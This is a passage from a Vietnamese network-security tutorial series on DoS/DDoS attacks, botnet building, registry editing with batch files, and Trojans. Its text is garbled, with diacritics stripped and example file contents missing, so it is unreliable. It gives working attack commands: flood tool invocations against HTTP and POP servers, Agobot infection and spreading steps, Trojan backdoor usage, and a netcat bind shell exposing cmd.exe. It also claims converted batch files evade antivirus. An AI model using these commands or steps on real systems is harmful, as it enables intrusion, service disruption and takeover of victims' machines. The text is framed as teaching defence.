truy cp vo my ch khng.

- Ph hoi hoc thay i cc thng tin cu hnh.

- Ph hoi tng vt l hoc cc thit b mng nh ngun in, iu ho

III. Cc dng tn cng

Tn cng Denial of Service chia ra lm hai loi tn cng

- Tn cng DoS: Tn cng t mt c th, hay tp hp cc c th.

- Tn cng DDoS: y l s tn cng t mt mng my tnh c thit k tn

cng ti mt ch c th no .

1. Cc dng tn cng DoS

- Smurf

- Buffer Overflow Attack



- Ping of Death

- Teardrop

- SYN Attack

a. Tn cng Smurf

- L th phm sinh ra cc nhiu giao tip ICMP (ping) ti a ch Broadcast ca

nhiu mng vi a ch ngun l mc tiu cn tn cng.

* Chng ta cn lu l: Khi ping ti mt a ch l qu trnh hai chiu Khi my

A ping ti my B my B reply li hon tt qu trnh. Khi ti ping ti a ch

Broadcast ca mng no th ton b cc my tnh trong mng s Reply li

ti. Nhng gi ti thay i a ch ngun, thay a ch ngun l my C v ti ping

ti a ch Broadcast ca mt mng no , th ton b cc my tnh trong mng

s reply li vo my C ch khng phi ti v l tn cng Smurf.

- Kt qu ch tn cng s phi chu nhn mt t Reply gi ICMP cc ln v lm

cho mng b dt hoc b chm li khng c kh nng p ng cc dch v khc.

- Qu trnh ny c khuych i khi c lung ping reply t mt mng c kt

ni vi nhau (mng BOT).

- tn cng Fraggle, chng s dng UDP echo v tng t nh tn cng Smurf.



Hnh hin th tn cng DoS - dng tn cng Smurf s dng gi ICMP lm ngp cc

giao tip khc.

b. Tn cng Buffer overflow.

- Buffer Overflow xy ra ti bt k thi im no c chng trnh ghi lng thng

tin ln hn dung lng ca b nh m trong b nh.

- K tn cng c th ghi ln d liu v iu khin chy cc chng trnh v

nh cp quyn iu khin ca mt s chng trnh nhm thc thi cc on m

nguy him. - Tn cng Buffer Overflow ti trnh by cch khai thc li ny

trong bi vit trc v hacking windows cng trn trang www.vnexperts.net.



- Qu trnh gi mt bc th in t m file nh km di qu 256 k t c th s

xy ra qu trnh trn b nh m.

c. Tn cng Ping of Death

- K tn cng gi nhng gi tin IP ln hn s lng bytes cho php ca tin IP l

65.536 bytes.

- Qu trnh chia nh gi tin IP thnh nhng phn nh c thc hin layer II.

- Qu trnh chia nh c th thc hin vi gi IP ln hn 65.536 bytes. Nhng h

iu hnh khng th nhn bit c ln ca gi tin ny v s b khi ng li,

hay n gin l s b gin on giao tip.

- nhn bit k tn cng gi gi tin ln hn gi tin cho php th tng i d

dng.

d. Tn cng Teardrop

- Gi tin IP rt ln khi n Router s b chia nh lm nhiu phn nh.



- K tn cng s dng s dng gi IP vi cc thng s rt kh hiu chia ra cc

phn nh (fragment).

- Nu h iu hnh nhn c cc gi tin c chia nh v khng hiu c, h

thng c gng build li gi tin v iu chim mt phn ti nguyn h thng, nu

qu trnh lin tc xy ra h thng khng cn ti nguyn cho cc ng dng khc,

phc v cc user khc.

e. Tn cng SYN

- K tn cng gi cc yu cu (request o) TCP SYN ti my ch b tn cng.

x l lng gi tin SYN ny h thng cn tn mt lng b nh cho kt ni.

- Khi c rt nhiu gi SYN o ti my ch v chim ht cc yu cu x l ca my

ch. Mt ngi dng bnh thng kt ni ti my ch ban u thc hin Request



TCP SYN v lc ny my ch khng cn kh nng p li - kt ni khng c

thc hin.

- y l kiu tn cng m k tn cng li dng qu trnh giao tip ca TCP theo

Three-way.

- Cc on m nguy him c kh nng sinh ra mt s lng cc ln cc gi TCP

SYN ti my ch b tn cng, a ch IP ngun ca gi tin b thay i v

chnh l tn cng DoS.

- Hnh bn trn th hin cc giao tip bnh thng vi my ch v bn di th

hin khi my ch b tn cng gi SYN n s rt nhiu trong khi kh nng tr

li ca my ch li c hn v khi my ch s t chi cc truy cp hp php.

- Qu trnh TCP Three-way handshake c thc hin: Khi my A mun giao tip

vi my B. (1) my A bn ra mt gi TCP SYN ti my B (2) my B khi nhn

c gi SYN t A s gi li my A gi ACK ng kt ni (3) my A gi li

my B gi ACK v bt u cc giao tip d liu.

- My A v my B s d kt ni t nht l 75 giy, sau li thc hin mt qu

trnh TCP Three-way handshake ln na thc hin phin kt ni tip theo

trao i d liu.

- Tht khng may k tn cng li dng k h ny thc hin hnh vi tn cng

nhm s dng ht ti nguyn ca h thng bng cch gim thi gian yu cu

Three-way handshake xung rt nh v khng gi li gi ACK, c bn gi SYN ra

lin tc trong mt thi gian nht nh v khng bao gi tr li li gi SYN&ACK

t my b tn cng.

- Vi nguyn tc ch chp nhn gi SYN t mt my ti h thng sau mi 75 giy

nu a ch IP no vi phm s chuyn vo Rule deny access s ngn cn tn cng

ny.



IV. Cc cng c tn cng DoS

- Jolt2

- Bubonic.c

- Land and LaTierra

- Targa

- Blast20

- Nemesy

- Panther2

- Crazy Pinger

- Some Trouble

- UDP Flood

- FSMax



1. Tools DoS Jolt2

- Cho php k tn t chi dch v (DoS) ln cc h thng trn nn tng Windows

- N l nguyn nhn khin my ch b tn cng c CPU lun hot ng mc

100%, CPU khng th x l cc dch v khc.

- Khng phi trn nn tng Windows nh Cisco Router v mt s loi Router khc

cng c th b l hng bo mt ny v b tools ny tn cng.

2. Tools DoS: Bubonic.c

- Bubonic.c l mt tools DoS da vo cc l hng bo mt trn Windows 2000

- N hot ng bng cch ngu nhin gi cc gi tin TCP vi cc thit lp ngu

nhin lm cho my ch tn rt nhiu ti nguyn x l vn ny, v t s

xut hin nhng l hng bo mt.

- S dng bubonic.c bng cch g cu lnh: bubonic 12.23.23.2 10.0.0.1 100



3. Tools DoS: Land and LaTierra

- Gi mo a ch IP c kt hp vi qu trnh m cc kt ni gia hai my tnh.

- C hai a ch IP, a ch ngun (source) v a ch IP ch, c chnh sa thnh

mt a ch ca IP ch khi kt ni gia my A v my B ang c thc hin

nu c tn cng ny xy ra th kt ni gia hai my A v B s b ngt kt ni.

- Kt qu ny do a ch IP ngun v a ch IP ch ca gi tin ging nhau v gi

tin khng th i n ch cn n.

4. Tools DoS: Targa

- Targa l mt chng chnh c th s dng 8 dng tn cng DoS khc nhau.

- N c coi nh mt b hng dn tch hp ton b cc nh hng ca DoS v

thng l cc phin bn ca Rootkit.

- K tn cng s dng mt trong cc phng thc tn cng c th ti mt h thng

bao gi t c mc ch th thi.

- Targa l mt chng trnh y sc mnh v n c kh nng to ra mt s nguy

him rt ln cho h thng mng ca mt cng ty.



5. Tools DoS Blast 2.0

- Blast rt nh, l mt cng c dng kim tra kh nng ca dch v TCP n c

kh nng to ra mt lu lng rt ln gi TCP v c th s gay nguy him cho mt

h thng mng vi cc server yu.

- Di y l cch s dng tn cng HTTP Server s dng Blast2.0

+ Blast 192.168.1.219 80 40 50 /b GET /some /e url/ HTTP/1.0 /nr /dr /v

- Tn cng my ch POP

+ Blast 192.168.1.219 110 15 20 /b user te /e d /v

6. Tools DoS Nemesys

- y l mt chng trnh sinh ra nhng gi tin ngu nhin nh (protocol, port, etc.

size, )

- Da vo chng trnh ny k tn cng c th chy cc on m nguy him vo

my tnh khng c bo mt.



7. Tool DoS Panther2.

- Tn cng t chi dch v da trn nn tng UDP Attack c thit k dnh ring

cho kt ni 28.8 56 Kbps.

- N c kh nng chim ton b bng thng ca kt ni ny.

- N c kh nng chim bng thng mng bng nhiu phng php v nh thc

hin qu trnh Ping cc nhanh v c th gy ra tn cng DoS

8. Tool DoS Crazy Pinger

- Cng c ny c kh nng gi nhng gi ICPM ln ti mt h thng mng t xa.



9. Tool DoS Some Trouble

- SomeTrouble 1.0 l mt chng trnh gy nghn h thng mng

- SomeTrouble l mt chng trnh rt n gin vi ba thnh phn

+ Mail Bomb (t c kh nng Resole Name vi a ch mail c)

+ ICQ Bomb

+ Net Send Flood



10. DoS Tools UDP Flood

- UDPFlood l mt chng trnh gi cc gi tin UDP

- N gi ra ngoi nhng gi tin UDP ti mt ac h IP v port khng c nh

- Gi tin c kh nng l mt on m vn bn hay mt s lng d liu c sinh

ngu nhin hay t mt file.

- c s dng kim tra kh nng p ng ca Server



11. Tools DoS FSMAX

- Kim tra hiu nng p ng ca my ch.

- N to ra mt file sau chy trn Server nhiu ln lp i lp li mt lc.

- Tc dng ca tools ny l tm cch tn cng lm chn b nh m v tn cng

DoS ti my ch.

V. Kt lun phn I.

- Khi s dng mt Tool tn cng DoS ti mt my ch i khi khng gy nh

hng g cho my ch - Gi s bn s dng tool Ping of Death ti mt my ch,

trong my ch kt ni vi mng tc 100Mbps bn kt ni ti my ch tc

3Mbps - Vy tn cng ca bn khng c ngha g.

- Nhng bn hy tng tng c 1000 ngi nh bn cng mt lc tn cng vo

my ch kia khi ton b bng thng ca 1000 ngi cng li ti a t 3Gbps

v tc kt ni ca my ch l 100 Mbps vy kt qu s ra sao cc bn c kh

nng tng tng.



- Trong phn II ca lot bi vit ti s trnh by vi cc bn nhng ni dung v

nh ngha BOT, BOTNET, cch xy dng, cch s dng cc BOTNET t

chng ta hiu cch hot ng v tm ra nhng gii php chng tn cng DDoS

mt cch hiu qu nht.

Theo - Tocbatdat ca Vnexperts Research Department



Phn tip ca bi vit v tn cng DoS v DDoS ti s trnh by vi cc bn ni

dung chi tit v mng Bot, cc dng mng Bot v cch to ra mng Botnet. Khi

hiu v mng Botnet bn c th hnh dung ra phng thc tn cng DDoS. Trong

phn II ny ti cng trnh by vi cc bn chi tit cc phng thc tn cng DDoS

cc thc hin cc phng thc tn cng ny. Nhng bi vit ny ch c tc dng

gip cc bn hiu bit su v tn cng DDoS m thi, cc tools gii thiu ch mang

tnh gii thiu v n l cc tools DDoS c.

VI. Mng BOT NET

1. ngha ca mng BOT

- Khi s dng mt Tool tn cng DoS ti mt my ch i khi khng gy nh

hng g cho my ch - Gi s bn s dng tool Ping of Death ti mt my ch,

trong my ch kt ni vi mng tc 100Mbps bn kt ni ti my ch tc

3Mbps - Vy tn cng ca bn khng c ngha g.

- Nhng bn hy tng tng c 1000 ngi nh bn cng mt lc tn cng vo

my ch kia khi ton b bng thng ca 1000 ngi cng li ti a t 3Gbps

v tc kt ni ca my ch l 100 Mbps vy kt qu s ra sao cc bn c kh

nng tng tng.

- Nhng ti ang th hi lm cch no c 1000 my tnh kt ni vi mng ti

i mua mt nghn chic v thu 1000 thu bao kt ni - chc chn ti khng lm

nh vy ri v cng khng k tn cng no s dng phng php ny c.

- K tn cng xy dng mt mng gm hng nghn my tnh kt Internet (c mng

BOT ln ti 400.000 my). Vy lm th no chng c kh nng li dng ngi kt

ni ti Internet xy dng mng BOT trong bi vit ny ti s gii thiu vi cc

bn cc mng BOT v cch xy dng, nhng Tool xy dng.



- Khi c trong tay mng BOT k tn cng s dng nhng tool tn cng n gin

tn cng vo mt h thng my tnh. Da vo nhng truy cp hon ton hp l ca

h thng, cng mt lc chng s dng mt dch v ca my ch, bn th tng

tng khi k tn cng c trong tay 400.000 my ch v cng mt lc ra lnh cho

chng download mt file trn trang web ca bn. V chnh l DDoS

Distributed Denial of Servcie

- Khng c mt phng thc chng tn cng DDoS mt cch hon ton nhng

trong bi vit ny ti cng gii thiu vi cc bn nhng phng php phng chng

DDoS khi chng ta hiu v n.

2. Mng BOT

- BOT t vit tt ca t RoBOT

- IRCbot cn c gi l zombia hay drone.

- Internet Relay Chat (IRC) l mt dng truyn d liu thi gian thc trn Internet.

N thng c thit k sao cho mt ngi c th nhn c cho mt group v

mi ngi c th giao tip vi nhau vi mt knh khc nhau c gi l

Channels.

- u tin BOT kt ni knh IRC vi IRC Server v i giao tip gia nhng

ngi vi nhau.

- K tn cng c th iu khin mng BOT v s dng mng BOT cng nh s

dng nhm mt mc ch no .

- Nhiu mng BOT kt ni vi nhau ngi ta gi l BOTNET botnet.

3. Mng Botnet.

- Mng Botnet bao gm nhiu my tnh

- N c s dng cho mc ch tn cng DDoS



- Mt mng Botnet nh c th ch bao gm 1000 my tnh nhng bn th tng

tng mi my tnh ny kt ni ti Internet tc ch l 128Kbps th mng Botnet

ny c kh nng to bng thng l 1000*128 ~ 100Mbps y l mt con s

th hin bng thng m kh mt nh Hosting no c th share cho mi trang web

ca mnh.

4. Mc ch s dng mng Botnets

- Tn cng Distributed Denial-of-Service - DDoS

+ Botnet c s dng cho tn cng DDoS

- Spamming

+ M mt SOCKS v4/v5 proxy server cho vic Spamming

- Sniffing traffic

+ Bot cng c th s dng cc gi tin n sniffer (tm c cc giao tip trn mng)

sau khi tm c cc gi tin n c gng gii m gi tin ly c cc ni dung

c ngha nh ti khon ngn hng v nhiu thng tin c gi tr khc ca ngi s

dng.

- Keylogging

+ Vi s tr gip ca Keylogger rt nhiu thng tin nhy cm ca ngi dng c

th s b k tn cng khai thc nh ti khon trn e-banking, cng nh nhiu ti

khon khc.

- Ci t v ly nhim chng trnh c hi

+ Botnet c th s dng to ra mng nhng mng BOT mi.

- Ci t nhng qung co Popup

+ T ng bt ra nhng qung co khng mong mun vi ngi s dng.



- Google Adsense abuse

+ T ng thay i cc kt qu tm kim hin th mi khi ngi dng s dng dch

v tm kim ca Google, khi thay i kt qu n s la ngi dng kch vo nhng

trang web nguy him.

- Tn cng vo IRC Chat Networks

+ N c gi l clone attack

- Phishing

+ Mng botnet cn c s dng phishing mail nhm ly cc thng tin nhy

cm ca ngi dng.

5. Cc dng ca mng BOT.

Agobot/Phatbot/Forbot/XtremBot

- y l nhng bot c vit bng C++ trn nn tng Cross-platform v m ngun

c tm trn GPL. Agobot c vit bi Ago nick name c ngi ta bit n l

Wonk, mt thanh nin tr ngi c b bt hi thng 5 nm 2004 vi ti danh

v ti phm my tnh.

- Agobot c kh nng s dng NTFS Alternate Data Stream (ADS) v nh mt

loi Rootkit nhm n cc tin trnh ang chy trn h thng

SDBot/Rbot/UrBot/UrXbot

- SDBot c vit bng ngn ng C v cng c public bi GPL. N c coi

nh l tin thn ca Rbot, RxBot, UrBot, UrXBot, JrBot

mIRC-Based Bots GT-Bots



- GT c vit tt t fhai t Global Threat v tn thng c s dng cho tt c

cc mIRC-scripted bots. N c kh nng s dng phn mm IM l mIRC thit

lp mt s script v mt s on m khc.

6. Cc bc xy dng mng BotNet? Cch phn tch mng Bot.

hiu hn v xy dng h thng mng BotNet chng ta nghin cu t cch ly

nhim vo mt my tnh, cch to ra mt mng Bot v dng mng Bot ny tn

cng vo mt ch no ca mng Botnet c to ra t Agobots.

Bc 1: Cch ly nhim vo my tnh.

- u tin k tn cng la cho ngi dng chy file chess.exe, mt Agobot

thng copy chng vo h thng v s thm cc thng s trong Registry m

bo s chy cng vi h thng khi khi ng. Trong Registry c cc v tr cho cc

ng dng chy lc khi ng ti.

HKLM\Software\Microsoft\Windows\CurrentVersion\Run

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices

Bc 2: Cch ly lan v xy dng to mng BOTNET

- Sau khi trong h thng mng c mt my tnh b nhim Agobot, n s t ng

tm kim cc my tnh khc trong h thng v ly nhim s dng cc l hng trong

ti nguyn c chia s trong h thng mng.

- Chng thng c gng kt ni ti cc d liu share mc nh dnh cho cc ng

dng qun tr (administrator or administrative) v d nh: C$, D$, E$ v print$

bng cch on usernames v password c th truy cp c vo mt h thng

khc v ly nhim.



- Agobot c th ly lan rt nhanh bi chng c kh nng tn dng cc im yu

trong h iu hnh Windows, hay cc ng dng, cc dch v chy trn h thng.

Bc 3: Kt ni vo IRC.

- Bc tip theo ca Agobot s to ra mt IRC-Controlled Backdoor m cc

yu t cn thit, v kt ni ti mng Botnet thng qua IRC-Controll, sau khi kt

ni n s m nhng dch v cn thit khi c yu cu chng s c iu khin

bi k tn cng thng qua knh giao tip IRC.

Bc 4: iu khin tn cng t mng BotNet.

- K tn cng iu khin cc my trong mng Agobot download nhng file .exe v

chy trn my.

- Ly ton b thng tin lin quan v cn thit trn h thng m k tn cng mun.

- Chy nhng file khc trn h thng p ng yu cu ca k tn cng.

- Chy nhng chng trnh DDoS tn cng h thng khc.



7. S cch h thng b ly nhim v s dng Agobot.

VII. Cc tools tn cng DDoS

1. Nuclear Bot.

- Nuclear Bot l mt tool cc mnh Multi Advanced IRC BOT c th s dng

Floods, Managing, Utilities, Spread, IRC Related, tn cng DDoS v nhiu mc

ch khc.



VIII. Tn cng DDoS

Trn Internet tn cng Distributed Denial of Service l mt dng tn cng t nhiu

my tnh ti mt ch, n gy ra t chi cc yu cu hp l ca cc user bnh



thng. Bng cch to ra nhng gi tin cc nhiu n mt ch c th, n c th

gy tnh trng tng t nh h thng b shutdown.

1. Cc c tnh ca tn cng DDoS.

- N c tn cng t mt h thng cc my tnh cc ln trn Internet, v thng

da vo cc dch v c sn trn cc my tnh trong mng botnet

- Cc dch v tn cng c iu khin t nhng primary victim trong khi cc

my tnh b chim quyn s dng trong mng Bot c s dng tn cng

thng c gi l secondary victims.

- L dng tn cng rt kh c th pht hin bi tn cng ny c sinh ra t nhiu

a ch IP trn Internet.

- Nu mt a ch IP tn cng mt cng ty, n c th c chn bi Firewall. Nu

n t 30.000 a ch IP khc, th iu ny l v cng kh khn.

- Th phm c th gy nhiu nh hng bi tn cng t chi dch v DoS, v iu

ny cng nguy him hn khi chng s dng mt h thng mng Bot trn internet

thc hin tn cng DoS v c gi l tn cng DDoS.

2. Tn cng DDoS khng th ngn chn hon ton.

- Cc dng tn cng DDoS thc hin tm kim cc l hng bo mt trn cc my

tnh kt ni ti Internet v khai thc cc l hng bo mt xy dng mng Botnet

gm nhiu my tnh kt ni ti Internet.

- Mt tn cng DDoS c thc hin s rt kh ngn chn hon ton.

- Nhng gi tin n Firewall c th chn li, nhng hu ht chng u n t

nhng a ch IP cha c trong cc Access Rule ca Firewall v l nhng gi tin

hon ton hp l.



- Nu a ch ngun ca gi tin c th b gi mo, sau khi bn khng nhn c s

phn hi t nhng a ch ngun tht th bn cn phi thc hin cm giao tip vi

a ch ngun .

- Tuy nhin mt mng Botnet bao gm t hng nghn ti vi trm nghn a ch IP

trn Internet v iu l v cng kh khn ngn chn tn cng.

3. K tn cng khn ngoan.

Gi y khng mt k tn cng no s dng lun a ch IP iu khin mng

Botnet tn cng ti ch, m chng thng s dng mt i tng trung gian di

y l nhng m hnh tn cng DDoS

a. Agent Handler Model

K tn cng s dng cc handler iu khin tn cng

b. Tn cng DDoS da trn nn tng IRC

K tn cng s dng cc mng IRC iu khin, khuych i v qun l kt ni

vi cc my tnh trong mng Botnet.



IX. Phn loi tn cng DDoS

- Tn cng gy ht bng thng truy cp ti my ch.

+ Flood attack

+ UDP v ICMP Flood (flood gy ngp lt)

- Tn cng khuch i cc giao tip

+ Smurf and Fraggle attack

Tn cng DDoS vo Yahoo.com nm 2000



S phn loi tn cng DDoS

S tn cng DDoS dng Khuch i giao tip.

Nh cc bn bit tn cng Smurf khi s dng s Ping n a ch Broadcast ca

mt mng no m a ch ngun chnh l a ch ca my cn tn cng, khi

ton b cc gi Reply s c chuyn ti a ch IP ca my tnh b tn cng.



X. Tn cng Reflective DNS (reflective - phn chiu).

1. Cc vn lin quan ti tn cng Reflective DNS

- Mt Hacker c th s dng mng botnet gi rt nhiu yu cu ti my ch

DNS.

- Nhng yu cu s lm trn bng thng mng ca cc my ch DNS,

- Vic phng chng dng tn cng ny c th dng Firewall ngn cm nhng giao

tip t cc my tnh c pht hin ra.

- Nhng vic cm cc giao tip t DNS Server s c nhiu vn ln. Mt DNS

Server c nhim v rt quan trng trn Internet.

- Vic cm cc giao tip DNS ng ngha vi vic cm ngi dng bnh thng

gi mail v truy cp Website.



- Mt yu cu v DNS thng chim bng 1/73 thi gian ca gi tin tr li trn

my ch. Da vo yu t ny nu dng mt Tools chuyn nghip lm tng cc

yu cu ti my ch DNS s khin my ch DNS b qu ti v khng th p ng

cho cc ngi dng bnh thng c na.

2. Tool tn cng Reflective DNS ihateperl.pl

- ihateperl.pl l chng trnh rt nh, rt hiu qu, da trn kiu tn cng DNS-

Reflective

- N s dng mt danh sch cc my ch DNS lm trn h thng mng vi cc

gi yu cu Name Resolution.

- Bng mt v d n c th s dng google.com resole gi ti my ch v c th

i tn domain thnh www.vnexperts.net hay bt k mt trang web no m k

tn cng mun.

- s dng cng c ny, rt n gin bn to ra mt danh sch cc my ch

DNS, chuyn cho a ch IP ca my c nhn v thit lp s lng cc giao tip.

XI. Cc tools s dng tn cng DDoS.

Trong ton b cc tools ti gii thiu trong bi vit ny hu ht l cc tools c v

khng hiu qu, v ch mang tnh cht s phm cc bn c th hiu v dng tn

cng DDoS hn m thi. Di y l cc Tools tn cng DDoS.

- Trinoo - Tribe flood Network (TFN) - TFN2K - Stacheldraht

- Shaft

- Trinity - Knight - Mstream - Kaiten

Cc tools ny bn hon ton c th Download min ph trn Internet v lu l ch

th y l cc tools yu v ch mang tnh Demo v tn cng DdoS m thi.



Phn VI. K thut edit Registry bng cu lnh v ng dng bo mt

1. Vai tr ca command line

2. To ra file .bat thc thi t ng mt s thao tc

3. Cu hnh REGISTRY bng file.bat

4. ng dng cu hnh REGISTRY

5. Kt lun

1. Vai tr ca Command Line

- Bt k ngi qun tr h thng no cng phi s dng giao din cu lnh ca cc

h iu hnh. Trong h thng Windows cu lnh cng c s dng em li s

thun tin v tnh linh hot trong vic qun tr.

2. To ra file.bat thc thi t ng mt s thao tc

- Giao din cu lnh khi c thc hin di dng file.bat cho php thc hin

nhiu cu lnh lin tip.

- V d 1: s dng notepad vit ni dung di y v save ra file.bat:



Vi file.bat ni dung nh trn s to ra c mt file l c.txt vi ni dung: IP,

cc tin trnh ang hot ng, cc user trong my tnh, cc port m, cc services

ang hot ng, nhng thng tin chung trong h thng, cu trc th mc ca

C.Nh vy vi mt file.bat c to ra c th ly rt nhiu thng tin ca my

tnh.

3. Cu hnh REGISTRY bng file.bat

Mun cu hnh Registry chng ta phi lm cch no thc hin c hai tc v:

Bc 1: to ra file.reg vi ni dung mong mun bng cu lnh

Bc 2: chy file.reg va to ra



V d 3: chng ta cn to ra file.reg vi ni dung nh sau:

to ra file.reg vi ni dung nh trn bng mt file.bat nh sau:

Mt file.bat vi ni dung nh trn s thc hin nhng tc v g:

Bc 1: To ra c mt file.bat vi ni dung mong mun nh phn u ca v d

Bc 2: Chy file.reg va to ra

Bc 3: Xa ht cc file to ra

Kt qu sau khi to ra v chy file.bat vi ni dung ny s thm c mt key vo

Registry

V d 4: Sau khi thm c mt key vo gi ti li mun xa mt key trong

Registry th phi to ra mt file.bat vi ni dung ra sao:



Mt file.bat vi ni dung nh trn c hy s thc hin cc tc v g:

Bc 1: To ra file.reg vi ni dung mong mun. Khi mt folder l dng th 2

c la chn, trong mt folder ca Registry c nhiu key nhng ti ch mun xa

mt key l TOCBATDAT th ti c dng th 3. Dng th 4 l xa c mt folder

trong Registry.

Bc 2: Chy file.reg

Bc 3: xa ht cc file to ra.

Kt lun trong mc 3 ny ti hng dn mi ngi cch Edit (Thm, sa,

xa) Registry bng cu lnh, c bit l bng file.bat

4. ng dng cu hnh REGISTRY

Registry l ni lu ton b cc thit lp ca h thng Windows.

V d 5: Uninstall bt k chng trnh no. Trc tin chng ta hiu bn cht ca

vn Uninstall mt chng trnh l th no:

- Bc 1: tt tin trnh, tt services



- Bc 2: Xa ht nhng g lin quan ti chng trnh trong Regisry

- Bc 3: Xa thng tin trong Program files

thc hin bc 1: ta c cu lnh: Taskkill /F /IM Processname tt mt

tin chnh, tt mt services chng ta c cu lnh net stop servicename, disable

mt services c cu lnh sc config servicename start= disabled

thc hin bc 2: Trong mc 3 ti trnh by cch xa mt folder, key

trong registry vy l chng ta c th thc hin bc 2 ca Uninstall. uninstall

hon ton mt chng trnh yu cu chng ta phi tm c tt c cc key, folder

ca chng trnh trong registry. iu dn ti nu mt chng trnh ln nh

Microsoft office bn mun remove kiu ny l cc kh. Ti c mt kinh nghim

khi vit ra mt file.bat remove phn mm symantec phi lm mt 3 ngy v n

c 500 key trong registry cn xa.

thc hin bc 3: Xa file c cu lnh delete file /f /q. Xa ht file trong

mt foder dng cu lnh delete c:\folder\* /f /q

Tch hp tt c cc bc trong mt file.bat l c th thc hin c tt c mi

vic.

V d 6: Khng cho php mt file c kh nng chy trn my tnh.

V d ny cho php chng ta to ra mt file.bat ngn chn mt con virus khng cho

n chy trn my ca chng ta.

Bn cht ca qu trnh l s dng Group Policy trong phn Software retriction

rules hash rule. Nhng Group Policy ch l giao din ha edit Registry,

cho nn chng ta hon ton c th edit regisry lm mt tc v tng t.



5. Kt lun

Vic s dng file.bat cu hnh c Registry mang li nhiu gi tr gip cc bn

nghin cu v bo mt v hiu bit su hn v h thng. c bit khi cc file.bat

ny chuyn sang file.exe khng bao gi b coi l virus.



Phn VII. Backdoor v Trojan ton tp

Trong bi vit ny ti s trnh by vi cc bn v Trojan v Backdoor. Nhng khi

nim c bn v Trojan v Backdoor, phn loi v cch thc ly nhim Trojan v

Backdoor. Cng vi nhng kin thc khc nh s dng mt s Trojan c bn, cch

thc n Trojan vo trong mt file .Exe. Cui cng ti s a ra cc gii php

phng chng Trojan v Backdoor.

1. Gii thiu v Trojans

2. Cc dng v cch hot ng ca Trojan

3. Cch nhn bit my tnh b nhim Trojan

4. S khc nhau ca cc Trojans

5. S dng mt s Trojan tn cng

6. Ghp mt hay nhiu Trojans vo mt file .EXE bnh thng

7. Cch pht hin Trojans v Backdoor

8. Gii php phng chng Trojan Backdoor

9. Kt lun

1. Gii thiu v Trojans.

- Mt Trojan l mt chng trnh nh chy ch n v gy hi cho my tnh.

- Vi s tr gip ca Trojan, mt k tt cng c th d dng truy cp vo my tnh

ca nn nhn thc hin mt s vic nguy hi nh ly cp d liu, xa file, v

nhiu kh nng khc.



2. Cc dng v cch hot ng ca Trojan

- K tn cng c th truy cp c vo cc my tnh b nhim Trojans khi chng

Online.

- K tn cng c th truy cp v iu khin ton b my tnh ca nn nhn, v

chng c kh nng s dng vo nhiu mc ch khc nhau.

- Cc dng Trojans c bn:

+Remote Access Trojans Cho k tn cng kim sot ton b h thng t xa.

+ Data-Sending Trojans Gi nhng thng tin nhy cm cho k tn cng

+ Destructive Trojans Ph hy h thng



+ Denied-of-Service DoS Attack Trojan: Trojans cho tn cng DoS.

+ Proxy Trojans

+ HTTP, FTP Trojans: - Trojan t to thnh HTTP hay FTP server k tn cng

khai thc li.

+ Security Software Disable Trojan C tc dng tt nhng tnh nng bo mt

trong my tnh ca nn nhn.

- Mc ch ca nhng k vit ra nhng Trojans:

+ Ly thng tin ca Credit Card

+ Ly thng tin ca cc ti khon c nhn nh: Email, Password, Usernames,

+ Nhng d liu mt.

+ Thng tin ti chnh: Ti khon ngn hng

+ S dng my tnh ca nn nhn thc hin mt tc v no , nh tn cng,

scan, hay lm ngp h thng mng ca nn nhn.

3. Nhng con ng my tnh nn nhn nhim Trojan.

- Qua cc ng dng CHAT online nh IRC Interney Relay Chat

- Qua cc file c nh km trn Mail

- Qua tng vt l nh trao i d liu qua USB, CD, HDD



- Khi chy mt file b nhim Trojan

- Qua NetBIOS FileSharing

- Qua nhng chng trnh nguy him

- T nhng trang web khng tin tng hay nhng website cung cp phn mm

min ph

- N c kh nng n trong cc ng dng bnh thng, khi chy ng dng lp tc

cng chy lun Trojans.

4. Nhng cch nhn bit mt my tnh b nhim Trojans C bn nht C

th khng ng.

- CD-ROM t ng m ra ng vo.

- My tnh c nhng du hiu l trn mn hnh.

- Hnh nn ca cc ca s Windows b thay i

- Cc vn bn t ng in

- My tinh t ng thay i font ch v cc thit lp khc

- Hnh nn my tnh t ng thay i v khng th i li.

- Chut tri, chut phi ln nn..

- Chut khng hin th trn mn hnh.

- Nt Start khng hin th.

- Mt vi ca s cht bt ra

Cc Port s dng bi cc Trojan ph bin.

- Back Orifice S dng UDP protocol S dng Port 31337 v 31338



- Deep Throat S dng UDP protocol S dng Port 2140 v 3150

- NetBus S dng TCP Protocol S dng Port 12345 v 12346

- Whack-a-mole S dng TCP Qua Port 12361 v 12362

- Netbus 2 Pro S dng TCP Qua Port 20034

- GrilFriend - S dng Protocol TCP Qua Port 21544

- Masters Paradise - S dng TCP Protocol qua Port 3129, 40421,40422, 40423

v 40426.

nhn bit nhng Port no trn my tnh ang Active chng ta dng cu lnh:

Netstat

an

5. S dng mt s loi Trojan

Vi mc ch ca bi vit cc bn hiu v Trojan, s dng Trojan l mt trong

nhng ni dung c bn ca nghin cu v bo mt. Khi bit cch s dng v cch

hot ng ca cc loi Trojan bn c th t a ra cc gii php an ninh mng



cho doanh nghip ca mnh cng nh nhng d liu quan trng ca chng ta.

Trong phn ny ti gii thiu vi cc bn nhng loi Trojan sau:

- Tini

- iCmd

- Netcat

- HTTP RAT

a. Trojan Tini

Bt k mt my tnh no nu b nhim Trojan ny u cho php Telnet qua Port

7777 khng cn bt k thng tin xc thc no.

- Trojan ny nhim vo h thng th ch cn chy mt ln hoc Enter file l

OK mi th hon tt v i nhng thng tin Telnet ti port 7777.

- Trn my 192.168.1.33 chy file tini.exe gi ti ng trn bt k my no

cng c th dng lnh: Telnet 192.168.1.33 7777 l c th console vo c my

.



b. iCmd Trojan

Tng t nh Tini Trojan nhng khc mt iu l cho php la chn port

telnet v Password truy cp vo my b nhim trojan ny.

VD: My b nhim Trojan chy file iCmd.exe vi cu lnh

- iCmd.exe vne 8080

C ngha my ny enable telnet trn port 8080 v password l vne

Trong v d ny ti file: iCmd.exe ti th mc vnexperts.net trn C:\

- Trn my khc ti c th telnet ti my ny vi cu lnh:

- Telnet port

- Nh v d trn ti g: telnet 192.168.1.33 8080

H thng bt ti nhp password ti g vne vo v Enter



V kt qu

c. Netcat Trojan.

Trojan ny cho php chng ta la chn kh nhiu Options nh Port, chy ch

n, cho php telnet ..

chy Trojan ny ti g cu lnh:



Nc.exe L p -t e

-L l hot ng ch nghe

-p l Port s dng nghe.

-t cho php s dng Telnet

-e chy mt chng trnh no .

Trn v d ny ti chy vi cu lnh

- Nc.exe L p 8800 t e cmd.exe

Gi th ti c th ng bt k trn my no c th telnet ti my ny qua cng

